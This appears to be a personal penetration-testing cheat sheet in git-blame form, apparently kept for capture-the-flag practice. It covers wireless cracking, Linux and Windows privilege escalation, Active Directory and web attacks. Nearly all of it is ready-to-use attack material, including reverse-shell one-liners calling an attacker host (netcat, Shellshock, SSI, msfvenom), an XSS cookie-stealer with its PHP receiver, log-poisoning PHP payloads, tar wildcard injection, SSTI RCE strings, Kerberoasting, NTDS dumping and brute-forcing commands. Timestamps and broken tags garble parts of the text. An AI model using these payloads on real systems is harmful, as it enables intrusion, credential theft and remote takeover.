2021-02-17 15:34:30 +00:00
# Wireless
To start with WPA2 Cracking make sure that your network interface is in monitor < br / >
````
ifconfig wlan0 down
iwfconfig wlan0 mode managed
ifconfig wlan0 up
````
Then run airmon-ng < br / >
```
airmon-ng check kill
airmon-ng start wlan0
```
To sniff different AP (Access Points)< br / >
`airodump-ng wlan0`
To start capturing traffic for a specific AP we use channel number `-c` and MAC address `--bssid` < br />
`airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS wlan0 ` < br />
Now in order to capture the 4-way handshake we need to start the above command with a parameter `-w` so that the caputre file can be saved< br />
`airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS -w FILENAME wlan0` < br />
Keep this running and launch the deauthentication attack on the AP with a specific host , you can do this to death all clients/host on the AP < br / >
`aireplay-ng -0 0 -a MAC_ADDRESS -c HOST_NAME wlan0` < br />
When a client connects back to the host this will capture the handshake.To crack the password we need to use aircrack-ng < br / >
`aircrack-ng FILENAME.cap -w path/towordlist/`
2021-02-17 15:37:24 +00:00
When the passwords get cracked you can then go back to using `managed mode on your` network interface< br />
`sudo systemctl restart NetworkManager.service`
2020-09-22 16:39:22 +00:00
# Linux
2020-12-13 16:23:34 +00:00
2020-09-22 16:39:22 +00:00
### Stablilize Shell
2020-09-10 20:03:04 +00:00
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm , for using `clear` command
2020-09-10 19:58:17 +00:00
2021-03-24 18:19:39 +00:00
### Ping for devices on LAN
1. `netdiscover -i <interface>`
2. `arp-scan -l`
3. `fping -a -g <ip>/24`
4. `nmap -n -sP <ip>/24`
5. `for i in $(seq 1 254); do ping -c1 -t 1 192.168.168.$i; done`
2020-09-22 16:39:22 +00:00
### Spawn bash
2020-09-10 20:03:04 +00:00
* /usr/bin/script -qc /bin/bash 1& >/dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
2020-09-10 19:58:17 +00:00
2020-12-18 01:29:22 +00:00
### Vulnerable sudo (ALL,!root)
2020-12-18 01:29:40 +00:00
`sudo -u#-1 whoami` < br />
2020-12-18 01:29:22 +00:00
`sudo -u#-1 <path_of_executable_as_other_user>`
2020-10-18 18:16:43 +00:00
2020-11-29 16:45:22 +00:00
### Execute as diffent user
`sudo -u <user> <command>`
2020-12-09 16:25:40 +00:00
### FTP
Connect to ftp on the machine< br / >
`ftp user <ip>`
2020-12-11 22:26:41 +00:00
After successfully logged in you can download all files with
`mget *`
2020-12-09 16:25:40 +00:00
Download files recusively< br / >
` wget -r ftp://user:pass@<ip>/ `
2020-11-03 16:30:29 +00:00
### SMB Shares
2020-10-25 12:41:05 +00:00
#### SmbClient
2020-10-25 14:00:03 +00:00
* `smbclient -L \\\\<ip\\` listing all shares
* `smbclient \\\\<ip>\\<share>` accessing a share anonymously
* `smbclient \\\\10.10.209.122\\<share> -U <share> ` accessing a share with an authorized user
2020-10-25 13:56:23 +00:00
2020-10-25 12:41:05 +00:00
#### Smbmap
2020-10-25 13:51:30 +00:00
* `smbmap -u <username> -p <password> -H <ip>`
2020-10-18 18:16:43 +00:00
2020-10-25 13:56:23 +00:00
#### Smbget
* `smbget -R smb://<ip>/<share>`
2020-11-03 16:30:29 +00:00
### NFS shares
2020-11-03 16:29:50 +00:00
* `showmount -e <ip> ` This lists the nfs shares
* `mount -t nfs <ip>:/<share_name> <directory_where_to_mount>` Mounting that share
2020-11-03 18:48:42 +00:00
2020-11-10 16:01:18 +00:00
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u <user> -e ` Check cronjobs for a specific user
* `crontab -l` cronjob for the current user
* `cat /etc/crontab` system wide cronjobs
2020-09-22 16:39:22 +00:00
### Finding Binaries
2020-09-10 19:58:17 +00:00
2020-09-10 20:03:04 +00:00
* find . - perm /4000 (user id uid)
* find . -perm /2000 (group id guid)
2020-09-10 19:58:17 +00:00
2020-11-03 18:48:42 +00:00
### Finding File capabilites
`getcap -r / 2>/dev/null`
2020-11-16 21:55:44 +00:00
### Finding text in a files
`grep -rnw '/path/to/somewhere/' -e 'pattern'
`
2020-09-22 16:39:22 +00:00
### Changing file attributes
2020-09-10 19:58:17 +00:00
2020-09-10 20:05:19 +00:00
chattr + i filename `making file immutable` < br />
chattr -i filename `making file mutable` < br />
2020-09-10 20:04:22 +00:00
lschattr filename `Checking file attributes`
2020-09-22 16:34:15 +00:00
2020-09-28 16:13:59 +00:00
### Uploading Files
2020-09-28 16:15:10 +00:00
scp file/you/want `user@ip` :/path/to/store < br />
2020-09-28 16:14:40 +00:00
python -m SimpleHTTPServer [port] `By default will listen on 8000` < br />
2020-10-22 15:52:58 +00:00
python3 -m http.server [port] `By default will listen on 8000` < br />
2020-09-28 16:13:59 +00:00
2020-10-26 21:33:34 +00:00
### Downloading Files
2020-11-05 17:30:11 +00:00
`wget http://<ip>:port/<file>`
2020-10-26 21:33:34 +00:00
2021-08-25 18:48:51 +00:00
### Download files only with bash script
```
#!/bin/bash
download() {
read proto server path < < < "${1//"/"/ }"
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] & & PORT=80
exec 3< >/dev/tcp/${HOST}/$PORT
# send request
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >& 3
# read the header, it ends in a empty line (just CRLF)
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done < & 3
# read the data
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done < & 3
exec 3>& -
}
```
2020-11-01 16:56:22 +00:00
### Netcat to download files from target
`nc -l -p [port] > file` Receive file < br />
`nc -w 3 [ip] [port] < file ` Send file < br />
2020-11-03 16:32:12 +00:00
### Cracaking Zip Archive
2020-11-03 17:48:36 +00:00
`fcrackzip -u -D -p <path_to_wordlist> <archive.zip>`
2020-11-03 16:32:12 +00:00
2020-11-07 15:50:46 +00:00
### Decrypting PGP key
If you have `asc` key which can be used for PGP authentication then
* john key.asc > asc_hash
* john asc_hash --wordlists=path_to_wordlist
#### Having pgp cli
* pgp --import key.asc
* pgp --decrypt file.pgp
#### Having gpg cli
* gpg --import key.asc
* gpg --decrypt file.pgp
2020-11-03 17:47:59 +00:00
### killing a running job in same shell
`jobs`
```
Find it's job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
2020-11-05 16:59:26 +00:00
### SSH Port Forwarding
2021-07-01 08:54:53 +00:00
`ssh -L <map_blocked_port>:localhost:<port_that_is_blockd_> <username>@<ip>`
2020-11-03 17:47:59 +00:00
2021-04-27 19:43:39 +00:00
## SSH Dynamic Port Forwarding
`ssh username@ip -i id_rsa(optional) -D 1337`
2021-01-08 21:05:33 +00:00
### SSH auth log poisoning
Login as any user to see that it gets logged then try to login with a malicious php code
2021-03-20 11:39:52 +00:00
### Port Forwarding using chisel
On attacker machine `/chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse`
On target machine `./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>`
### Poisining ssh auth log
2021-01-08 21:05:33 +00:00
`ssh '<?php system($_GET['a']); ?>'@192.168.43.2`
Then `http://ip/page?a=whoami;`
2022-01-08 15:38:51 +00:00
## SMTP
Using `VRFY` we can check which email addresses are valid or we can try to send an email and verify through `RCPT TO:email` < br />
Sending an email address with attachment we can use `sawks`
```bash
swaks --server IP -f from@arz.com -t to@arz.com --attach file.rtf
```
2022-01-08 15:59:57 +00:00
https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
2021-11-25 20:12:50 +00:00
### Screen
If there's a deattached screen session running as root , we can re attach it only if screen binary has SUID bit `screen -r root/`
2021-01-13 19:45:08 +00:00
### Getting root with ln (symlink)
If we have permissions to run /usr/bin/ln as root we can onw the machine
```
echo 'bash' > root
chmod +x root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
```
2021-04-11 23:55:52 +00:00
### Escaping restricted Shell (rbash)
2021-09-09 12:23:19 +00:00
#### Using vi editor
2021-04-11 23:55:52 +00:00
```
: set shell =/bin/sh
: shell
```
Then setting the PATH variable
`/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`
2021-01-13 19:45:08 +00:00
2021-09-09 12:23:19 +00:00
#### Using -t 'bash --noprofile'
When logging in with ssh we can using -t to enable pseudo-tty allocation and then we can change the PATH and SHELL varaible
2020-12-12 16:13:20 +00:00
### Tar Exploitation
When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory < br / >
```
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0< /tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
2021-01-08 21:05:33 +00:00
2020-11-29 17:41:22 +00:00
### Binary Exploits
If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed< br />
`export PATH=<path_where_binary_is>/:$PATH`
2021-11-27 00:00:18 +00:00
### Shared Library (LD_PRELOAD)
https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/
2021-11-14 11:57:20 +00:00
### MairaDB Command Execution
https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html
2021-03-23 16:11:17 +00:00
### VNC
If there's a port 5901 or 5900 open it's likely that it's for VNC , if you see `.remote_secret` or `.secret` it's the password for connecting for vnc
`vncviewer -passwd remote_secret <ip>::<port>`
#### Decrpyting vnc password
We can also decrypt the password for vnc using `https://github.com/jeroennijhof/vncpwd`
`./vncpwd remote_secret `
2020-12-13 16:23:34 +00:00
### Enumration
* cat /etc/*release
* cat /etc/issue
* uname -a
* lsb_release -a
* Running Linpeas
* ss -tulpn (for ports that are open on the machine)
2021-03-23 16:11:17 +00:00
* netstat -tulpn
* ps -ef --forest
2020-09-22 16:43:07 +00:00
# Windows
2020-09-22 16:34:15 +00:00
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
2020-09-22 16:43:07 +00:00
### Changing File Permissions
2020-09-22 16:45:03 +00:00
CACLS files /e /p {USERNAME}:{PERMISSION}< br / >
Permissions:< br / >
2020-09-22 16:44:32 +00:00
1.R `Read` < br />
2.W `Write` < br />
3.C `Change` < br />
2020-09-22 16:43:07 +00:00
4.F `Full Control`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Set File bits
attrib +r filename `add read only bit` < br />
attrib -r filename `remove read only bit` < br />
attrib +h filename `add hidden bit ` < br />
attrib -h filename `remove hidden bit`
2020-09-28 16:14:40 +00:00
2020-09-22 20:24:35 +00:00
### Show hidden file/folder
dir /a `show all hidden files & folder` < br />
dir /a:d `show only hidden folder` < br />
dir /a:h `show only hidden files` < br />
2020-10-26 21:33:34 +00:00
### Downloading Files
2020-10-26 21:42:27 +00:00
`certutil.exe -urlcache -f http://<ip>:<port>/<file> ouput.exe` < br />
2020-11-16 16:58:52 +00:00
`powershell -c "wget http://<ip>:<port>/<file>" -outfile output.exe` < br />
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
2020-09-22 16:39:22 +00:00
2021-04-29 05:42:24 +00:00
## Enumeration
* Running `winPEAS.exe` on the machine
* Running `PowerUp.ps1` (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) , documentation https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/ `. .\PowerUp.ps1` Then `Invoke-AllChecks`
2021-05-02 02:46:03 +00:00
## AlwaysInstallElevated
If you see that `reg query HKLM\Software\Policies\Microsoft\Windows\Installer` returns 1 it means that we can install any windows program as SYSTEM
So to exploit this generate a windows payload < br / >
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi > shell.msi` < br />
Start a netcat listener < br / >
Transfer and run this on target machine < br / >
`msiexec /quiet /qn /i shell.msi` < br />
Alternatively this can be done with metaslpoit's post exploitation module
`exploit/windows/local/always_install/elevated`
2021-04-29 05:42:24 +00:00
2020-11-16 16:58:52 +00:00
## List Drives
`wmic logicaldisk get caption`
2020-11-16 20:14:59 +00:00
## Decrypting PSCredential Object
* $file = Import-Clixml -Path < path_to_file >
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
2021-03-07 23:24:10 +00:00
### Evil-winrm
`evil-winrm -i 10.10.213.169 -u <USER> -p '<PASS>'`
### Psexec.py
` python psexec.py DOMAIN/USER:PASS@IP`
2021-10-06 23:45:31 +00:00
### Forced Authentication (Stealing NTLMv2)
https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
2021-04-28 01:35:36 +00:00
### Crackmapexec
#### Bruteforce Usernames using RID (Objects in AD)
`crackmapexec <IP> -u 'Anonymous' -p ' ' --rid-brute`
2021-03-17 15:37:55 +00:00
### Privlege Escalation using SeImpersonatePrivilege
If this is enabled we can upload `Printspoofer.exe ` and place it if we have rights
`PrintSpoofer.exe -i -c powershell.exe`
2021-03-07 23:24:10 +00:00
2021-03-17 18:43:59 +00:00
### Becoming NT\AUTHORITY (If user is in local administrators group)
If the system has `PsExec.exe` open elevated cmd
`.\PsExec.exe -i -s cmd.exe`
2021-10-03 21:38:11 +00:00
### Forced authentication (Stealing Hahses)
If we have access to upload files , we can upload SCF (Shell Command File) in which we can specify our IP and share so that when it makes a request to it , it's going to authenticate to our share with credentials
```
[Shell]
Command=2
IconFile=\\IP\share\test.ico
[Taskbar]
Command=ToggleDesktop
```
Then launch responder to capture the NTLMv2 hash
`responder -i tun0`
## Active Directory
2021-05-09 03:19:34 +00:00
2021-03-07 23:24:10 +00:00
`powershell -ep bypass` load a powershell shell with execution policy bypassed < br />
`. .\PowerView.ps1` import the PowerView module
2021-07-10 13:26:00 +00:00
### Query Users through LDAP
2021-07-10 13:27:18 +00:00
`windapsearch -d 'domain.local' --dc IP -m users`
2021-05-09 03:19:34 +00:00
## Gaining Infromation about AD Bloodhound
### Using BloodHound Injester
```
python3 bloodhound.py -d 'DOMAIN_NAME' -u 'VALID_USERNAME' -p 'VALID_PASSWORD' -gc 'HOSTNAME.DOMAIN' -c all -ns IP
```
Import the json files in bloodhound GUI < br / >
### Using Shraphound
2021-03-07 23:24:10 +00:00
* Upload `Sharphound.ps1` (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1)
* Then `. .\Sharhound.ps1`
* `Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip` Domain name can be found by running `Get-ADDomain` and look for result
< img src = "https://imgur.com/NxWapei.png" / >
* This command will give an archive which you will have to simply drag and drop on the bloodhound GUI running on your local machine and then quries for kerberoastable accounts or getting more information
2021-05-09 03:19:34 +00:00
## Kerberoasting Attack
### Using Impacket GETNPUsers.py
If we see any kerberoastable service account through bloodhound we can get that account's hash through this impacket script < br / >
```
python3 GetNPUsers.py DOMAIN/USERNAME:PASSWORD -dc-ip IP -request
```
### Using Rubeus
2021-03-07 23:24:10 +00:00
* Download rubeus `https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe`
* Documentation `https://github.com/GhostPack/Rubeus`
* Transfer rubeus.exe on targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
2021-05-09 03:19:34 +00:00
## Dumping NTDS.dit
If we find a user having DCsync rights or GetChangeAll privileges meaning to replicate AD secrets (NTDS.dit) we can dump NTDS.dit < br / >
```
python3 secretsdump.py 'DOMAIN/USERNAME':'PASSOWRD'@IP -just-dc-ntlm
```
2021-07-11 14:45:10 +00:00
### Abusing Constrained/Unconstrained Delegations
```
https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/
https://github.com/dirkjanm/krbrelayx
```
2021-05-09 03:19:34 +00:00
2021-04-07 17:24:18 +00:00
# FreeBSD
### Enumeration
* The path for binaries is `/usr/local/bin`
### Reverse Shell
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc <ip> <port> > /tmp/f`
2020-10-24 15:15:04 +00:00
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
2020-09-24 18:50:52 +00:00
2020-10-24 15:15:04 +00:00
# Meterpreter
2020-09-24 18:50:52 +00:00
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
2021-03-25 16:40:37 +00:00
### Pivoting
`use post/multi/manage/autoroute`
Example you are on a host with IP 172.18.0.1
`set RHOSTS 172.18.0.0`
`set SESSION <session_number`
### Using socks4a proxy
`use auxiliary/server/socks_proxy`
`SET SOCKS 4a`
`exploit`
Edit the port if you want to by default the `SRVPORT` is set to 1080 , you can edit it on `/etc/proxychains.conf`
### Port scan
`use auxiliary/scanner/portscan/tcp`
`set RHOSTS <subnet>/24`
2021-03-25 18:44:10 +00:00
### Port Forwarding
` portfwd add -l <port_to_listen> -p <port_to_be_open> -r <targeted_ip`
2021-04-28 02:05:01 +00:00
### MSSQL Code Execution
2021-04-29 01:37:13 +00:00
Using `use admin/mssql/mssql_exec` we can execute code by specifying the credentials< br />
2021-04-29 01:51:56 +00:00
Using `sqsh -S IP -U <username> -P <password>` then `EXEC master ..xp_cmdshell 'whoami' `
2021-04-29 01:37:13 +00:00
2021-04-28 02:05:01 +00:00
2020-11-08 16:43:56 +00:00
# Git
2020-12-02 17:34:02 +00:00
2020-11-08 16:43:56 +00:00
### Dumping repository
`./gitdumper.sh <location_of_remote_or_local_repostiory_having./.git> <destination_folder>`
### Extracting information from repository
`./extractor.sh <location_folder_having_.git_init> <extract_to_a_folder>`
2020-11-28 18:20:20 +00:00
# Web
2021-02-13 18:39:31 +00:00
2021-03-21 13:19:56 +00:00
### Make sure to check for backup files
If you came across a php file , look for a `.bak` as well i.e `config.php.bak`
2021-02-13 18:39:31 +00:00
### 403 By pass
https://github.com/intrudir/403fuzzer < br / >
`python3 403fuzzer.py -hc 403 -u http://<ip>/page_that_you_want_to_bypass(which is usally a 403 foribben)`
2021-05-25 14:17:57 +00:00
### Cgi-bin
If we find `cgi-bin` directory which exists on the web server it's good to fuzz for files in that directory and we find we can abuse this which is known as shell shock vulnerability to run bash commands on the web server through this application < br />
#### Manually
```bash
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>& 1' http://Remote IP/cgi-bin/file
```
#### Using Metasploit
`use multi/http/apache_mod_cgi_bash_env_exec`
2021-12-02 11:54:37 +00:00
### Symfony / Frontend server rule bypass
If we have don't have access to an endpoint could be an admin panel , we can just request for a `/` and at that point in either `X-Original-URL` or ` X-Rewrite-Url`
https://githubmemory.com/repo/sting8k/BurpSuite_403Bypasser/issues/4
2020-11-28 18:20:20 +00:00
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: < svg / onload = setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0) >
```
2021-04-30 00:39:15 +00:00
### LFI/RFI
2021-04-14 00:46:59 +00:00
2021-04-30 00:39:15 +00:00
Try to read local files like log files ,apache virtual host configuration file source code on the target machine< br / >
2021-04-14 00:46:59 +00:00
2021-04-30 00:39:15 +00:00
Virutal Hosts file : `/etc/apache2/sites-available/000-default.conf` < br />
If we can read log files,we can poison them to get RCE< br / >
2021-09-03 15:22:23 +00:00
#### For Apache2
For apache `/var/log/apache2/access.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent< br />
#### For Niginx
For niginx `/var/log/nginx/error.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent or try to add it in a file having a paramter make sure it's not being url encoded < br />
2021-12-02 05:55:55 +00:00
Also to check `/etc/nginx/sites-available/default`
2021-11-25 18:31:56 +00:00
#### Proc
To see list of processes running on the system we can read this file `/proc/sched_debug`
2021-12-02 09:16:06 +00:00
### XXE - XIncludes Attack
We can use XInclude when SOAP is being used in an application and we can't introduce DTD , so we'll have to replace a value of a paramter with < br / >
```
< foo xmlns:xi = "http://www.w3.org/2001/XInclude" >
< xi:include parse = "text" href = "file:///etc/passwd" / > < / foo >
```
2021-12-02 09:58:57 +00:00
### XXE - Apache Batik Library
https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
2021-12-02 09:16:06 +00:00
2021-11-11 14:18:10 +00:00
### SSI (Server Side Includes)
` echo '<!--#exec cmd="nc -e /bin/bash IP PORT" -->' > backdoor.shtml`
2021-05-10 03:52:34 +00:00
### SSTI (Server Side Template Injection)
#### Jinja2
2021-08-29 09:01:41 +00:00
To check if it's jinja test`{{7*'7'}}` this would return 7777
2021-05-10 03:52:34 +00:00
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI < br />
2021-09-03 15:22:23 +00:00
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}` < br />
2021-05-10 03:52:34 +00:00
2021-09-03 15:22:23 +00:00
**Exploit**< br / >
2021-05-10 03:52:34 +00:00
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
2021-09-06 12:06:30 +00:00
### SSTI WAF Bypass
- https://chowdera.com/2020/12/20201221231521371q.html
- https://www.fatalerrors.org/a/0dhx1Dk.html
- https://hackmd.io/@Chivato/HyWsJ31dI
2021-04-14 00:46:59 +00:00
2020-11-28 18:20:20 +00:00
2021-04-04 19:50:06 +00:00
### XSS Session Hijacking
Have this php file hosted on your machine< br / >
```
< ?php
header ('Location:http://domain');
if (isset($_GET["c"]))
{
$cookies = base64_decode(urldecode($_GET["c"]));
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
}
?>
```
Run this script where you find web application is vulnerable to xss
`<script>document.location='http://<ip>/cookie.php?c='+encodeURIComponent(btoa(document.cookie));</script>`
Alternatively run this < br / >
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md< br / >
2020-12-06 17:09:16 +00:00
### SQL Map
`sqlmap -r request.txt --dbms=mysql --dump`
2020-12-04 17:08:12 +00:00
### Wfuzz
`wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ`
2021-07-05 14:57:50 +00:00
If we want to use two payloads in the same request
`wfuzz -c -w path/to/firs/wordlist -w /path/to/second/wordlist -u http://ip/FUZZ/FUZ2Z` < br />
This FUZ2Z will specify to use the second wordlist , we can do this upto FUZnZ (where n is number of the wordlist we specify)
2020-11-28 18:20:20 +00:00
### API (Applicaton Programmable Interface)
* Check for possibility if there is a v1 , it is likely to be vulnerable to LFI
* Use wfuzz which is tool to fuzz for API end points or for parameter
`wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404` < br />
Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history` "?" is before the parameter and FUZZ is telling to find a parameter and we are looking for `.bash_hitory` as an example
2020-11-29 18:42:53 +00:00
### Web Shell Bash
`bash -c "<bash_rev_shell>"`
2020-12-09 22:11:54 +00:00
2021-11-12 16:43:39 +00:00
### Cacti
This is remote code execution exploit for cacti 1.2.8 < br / >
https://zerontek.blogspot.com/2020/10/hacking-walkthrough-cacti-128-ubuntu.html
2020-12-09 22:11:54 +00:00
### Wordpress
using wpscan we can find users or do some further enumeration of wordpress version
2021-01-02 14:19:14 +00:00
* `wpscan --url http://<ip>/wordpress -e u` Enumerate Users
2021-03-27 18:41:59 +00:00
* `wpscan --url http://<ip>/wordpress -e ap --plugins-detection aggressive` Enumearte All plugins
2020-12-09 22:11:54 +00:00
2021-11-25 18:35:17 +00:00
#### To bruteforce passwords
2020-12-09 22:11:54 +00:00
* `wpscan --url <ip> -U user_file_path -P password_file_path`
After logging into the wordpress dashboard , we can edit theme's 404.php page with a php revershell
`http://<ip>/wordpress/wp-content/themes/twentytwenty/404.php`
2021-11-25 18:35:17 +00:00
#### To list which plugins are being used
2021-11-24 12:18:59 +00:00
`nmap -p 80 --script http-wordpress-enum --script-args search-limit=3000 10.10.11.125 -vv `
2021-11-25 18:35:17 +00:00
#### To get a RCE
2021-02-12 19:49:42 +00:00
* Goto `Appearance` -> `Editor` Select the 404.php template of the current theme and paste php reverse-shell.
* Then navigate to `http://ip/wp-content/themes/twentyfifteen/404.php` (theme name can be twentytwenty for the latest one)
2021-11-25 18:35:17 +00:00
#### Manual Enumeration
https://www.armourinfosec.com/wordpress-enumeration/
2021-08-20 08:48:26 +00:00
### Node JS
#### Prototype Pollution
##### PUG
```
{
"key": "value",
"__proto__.block":
{
"type": "Text",
"line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
"val": "THIS IS THE VALUE"
}
}
```
2021-12-02 05:55:55 +00:00
### JTW
#### JKU
2021-08-20 08:48:26 +00:00
2021-12-02 05:55:55 +00:00
https://blog.pentesteracademy.com/hacking-jwt-tokens-jku-claim-misuse-2e732109ac1c
2021-08-20 08:48:26 +00:00
2021-07-12 18:58:08 +00:00
### Apache Tomcat
```
If we have access to /manager/html , we can upload a WAR payload (arz.war) and access it through http://ip/arz
```
#### Apache Tomcat used with nginx
```
If we nginx is being used as a reverse proxy to apache tom we can abuse it through Path Traversal Trough Reverse Proxy Mapping
```
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
2020-11-28 18:20:20 +00:00
# Wordlists
### Directory Bruteforcing
* /usr/share/wordlists/dirb/big.txt
* /usr/share/wordlists/dirb/common.txt
* /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
2020-12-02 17:36:23 +00:00
### Gobuster
* `gobuster dir -u http://<ip>/ -w <path_to_wordlist>`
* `gobuster dir -u http://<ip>/ -w <path_to_wordlist> -s "204,301,302,307,401,403"` (use status code if 200 is configured to respond on the web server to every get request)
2020-12-02 17:34:02 +00:00
### Feroxbuster
`feroxbuster -u http://<ip>/ -w <path_to_wordlist>`
2020-11-28 18:20:20 +00:00
2020-12-02 17:34:02 +00:00
### Dirsearch
`python3 dirsearch.py -u http://<ip>/ -w <path_to_text>`
### Credential Bruteforcing
2020-11-28 18:20:20 +00:00
* /usr/share/wordlists/rockyou.txt
* /usr/share/wordlists/fasstrackt.txt
* using `crackstation`
* using `seclists`
2021-04-13 12:39:40 +00:00
### Hydra
When the login shows an error message< br / >
`hydra -l admin -P /usr/share/wordlists/rockyou.txt < ip > http-post-form '/login.php:username=^USE
R^& password=^PASS^:F=Incorrect!' -t 64 -V -I`
When the login doesn't show an error message so we can specify a `success (s)` string which is shown after we login to a site , typically logout is shown to us.< br />
`hydra -l admin -P /usr/share/wordlists/rockyou.txt < ip > http-post-form '/login.php:username=^USE
R^& password=^PASS^:S=logout' -t 64 -V -I`
2021-03-30 21:18:51 +00:00
# Hash Cracking
### Hashcat
* If you have a salted hash and you know the salt to crack it `hash:salt`
2020-11-29 18:42:53 +00:00
# Generating Worlists for directory brute force
### Cewl
This spiders the given url and finding keyowrds then makes a wordlists through it's findings< br / >
`cewl.rb <ip>`
2021-03-23 15:57:53 +00:00
### Cruch
If we want to generate a password list having length of 7 starting with "milo" and having 3 digit number at the end we can use % for numbers , @ for lowercase letters, , for uppercase letters and ^ for special characters
` crunch 7 7 0123456789 -t milo%%% -o password.txt`
2021-01-10 23:13:16 +00:00
# DNS
2021-04-03 23:45:43 +00:00
### Finding Subdomain
`wfuzz -c -w <path_to_wordlist> -u 'http://domain.com -H "Host: FUZZ.domain.com" `
2020-12-12 12:48:05 +00:00
2021-01-10 23:13:16 +00:00
### Zone Transfer
If there is a port 53 open on the machine you could do a zone transfer to get information about DNS records
`dig axfr @< ip > < domain_name >
2020-09-22 16:39:22 +00:00
# King Of The Hill (KoTH)
2020-09-23 16:51:41 +00:00
### Monitoring and Closing Shell (Linux)
2020-09-22 16:39:22 +00:00
* strace `debugging / tamper with processes`
* gbd `c/c++ debugger`
* script - records terminal activites
* w /who `check current pts ,terminal device`
2020-10-22 15:51:56 +00:00
* ps -t ps/pts-number `process monitoring`
* script /dev/pts/pts-number `montior terminal`
2020-09-22 16:39:22 +00:00
* cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitary text on terminal`
* pkill -9 -t pts/pts-number
2021-01-27 11:11:49 +00:00
* Add this in root's crontab (crontab -e) < br />
```
*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>& 1'
```
2021-01-27 11:14:09 +00:00
Or you can add in system wide contab (nano /etc/crontab)
```
*/1 * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>& 1'
```
2020-10-31 15:18:55 +00:00
### Change SSH port
`nano /etc/ssh/sshd_config` (change PORT 22 to any port you want also you can tinker with configuration file)
2020-11-11 23:21:15 +00:00
`service sshd restart` (Restart SSH service to apply changes)
2020-10-31 15:20:31 +00:00
### Hide yourself from "w" or "who"
`ssh user@ip -T` This -T will have some limiations , that you cannot run bash and some other commands but is helpful.
2020-10-31 15:04:52 +00:00
### Run Bash script on king.txt
`while [ 1 ]; do /root/chattr -i king.txt; done &`
2020-10-22 15:51:56 +00:00
### Send messages to logged in users
* echo "msg" > /dev/pts/pts-number `send message to specific user` < br />
* wall msg `boradcast message to everyone` < br />
